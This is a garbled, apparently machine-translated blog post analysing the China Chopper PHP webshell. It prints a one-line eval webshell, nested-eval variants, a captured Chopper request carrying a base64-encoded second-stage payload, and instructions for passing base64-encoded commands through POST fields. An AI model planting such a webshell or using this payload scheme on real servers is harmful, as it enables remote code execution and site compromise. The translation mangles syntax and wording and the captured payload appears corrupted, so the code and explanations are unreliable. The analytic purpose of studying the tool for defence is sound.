PHP Chopper Analysis Learning

Here's an example of eval.

We know that eval in PHP can execute strings as code:

Eval (' Phpcode ');

Note that the code here has to end with a semicolon, and we test:

We create one of the simplest shells:

<? PHP Eval ($_post[' a ']);

Send at Post data location:

A=phpinfo()

You can see that phpinfo () is not executed.

The original reason is to add; Number knot speed A statement, like PHP syntax, after the statement to add; No.

Another problem here is that the input a=phpinfo (); You do not need to enclose them in single or double quotes:

Back to Eval, we add multi-layered eval to see:

<? PHP Eval (eval (eval ($_post[a]));

See the effect is the same:

We create a simple webshell, open the grab kit tool to catch the chopper bag, catch the sending packet is this:

post/2.php http/1.1Cache-control:no-Cachex-forwarded- for: 226.60.187.9Referer: http://localhostcontent-type:application/x-www-form-Urlencodeduser-agent:mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) Host:localhostcontent-length:738Connection:Closea=%40Eval%01%28Base64_decode%28%24_post%5bz0%5d%29%29%3b&z0= Qgluav9zzxqoimrpc3bsyxlfzxjyb3jziiwimcipo0bzzxrfdgltzv9saw1pdcgwkttac2v0x21hz2ljx3f1b3rlc19ydw50aw1lkdapo2vjag8oii0 %2bfcipozskrd1iyxnlnjrfzgvjb2rlkcrfue9tvfsiejeixsk7jey9qg9wzw5kaxiojeqpo2lmkcrgpt1ovuxmkxtly2hvkcjfuljpujovlybqyxroie5vdc Bgb3vuzcbpcibobybqzxjtaxnzaw9uisipo31lbhnleyrnpu5vtew7jew9tlvmtdt3aglszsgktj1acmvhzgrpcigkrikpeyrqpsreliivii4ktjskvd1azgf 0zsgiws1tlwqgsdpponmilebmawxlbxrpbwuojfapkttajeu9c3vic3rykgjhc2vfy29udmvydchazmlszxblcm1zkcrqkswxmcw4kswtnck7jfi9ilx0ii4k Vc4ixhqilkbmawxlc2l6zsgkuckuilx0ii4krs4icii7awyoqglzx2rpcigkuckpje0upsroliivii4kujtlbhnlicrmlj0kti4kujt9zwnobyakts4ktdtay 2xvc2vkaxiojeypo307zwnobygifdwtiik7zgllkck7&z1=rdpcxhbocfn0dwr5xfxxv1dcxa%3d%3d

Simply look at the above post package, in the absence of Base64 decryption premise, can obviously see the chopper will create another post data (in the Z0) sent back to a.

We can learn that the chopper sends the package, a bit like this:

<? PHP Eval ($_post[a]); # Post: # $_post[a] = another POST data # $_post[a] = $_post[b] # the contents of the incoming $_post[a]=$_post[b]=b

In other words, when we send a package, we can construct this:

a=$_post[b]&b=phpinfo

This is equivalent to:

A=phpinfo

Remember what we said above, to add; No single double quotes:

A=$_post[b];&b=phpinfo ()

This data is equivalent to:

A=phpinfo(); # $_post[b] Replaced by: Phpinfo ()

Let's test the effect:

As you can see, the phpinfo () function is not executed.

Why is it?

Use a small example to illustrate why:

Echo ' Post[a]: '. $_post [A]. " <br/> "; Echo ' post[b]: '. $_post [b];

After sending the data, it looks like this:

As you can see, the value of a is $_post[b]; but this $_post[b]; just a simple string, and this string is not interpreted as PHP code.

the equivalent of creating a code like this:

<?php ' $_post[b] ';

Such a parameter would definitely go wrong, or you would have created a code like this:

Eval (' ABCDEFG ');

The eval requirement is a string in the form of PHP code, so the following is legal:

Eval (' echo ' ABCDEFG '; ');

Finally, we can construct this code:

Eval (' eval (' $_post[b] ');

This allows the Phpinfo function to run normally.

Add eval into the code:

One thing to note is that the PHP code parameter in $_post[b] should be added; Because the eval in $_post[a] is used, and the PHP code in $_post[a] is added; Because the eval in the source code needs to be used.

In the location of $_post[a] We can also use Base64 encoding data, so $_post[b] data can be very good to send the normal:

In summary, the goal of Eval in the POST data in a is to interpret his value $_post[b].

We can actually just use one a=post data in the sending data location.

<?phpeval ($_post[a]);

After receiving, we can use the way we want to decrypt (if your data is encrypted):

<? PHP Eval (base64_decode($_post[a]));
#post
#a =cghwaw5mbygpow==

That's the way Java's C-knife is.

PHP Chopper Analysis Learning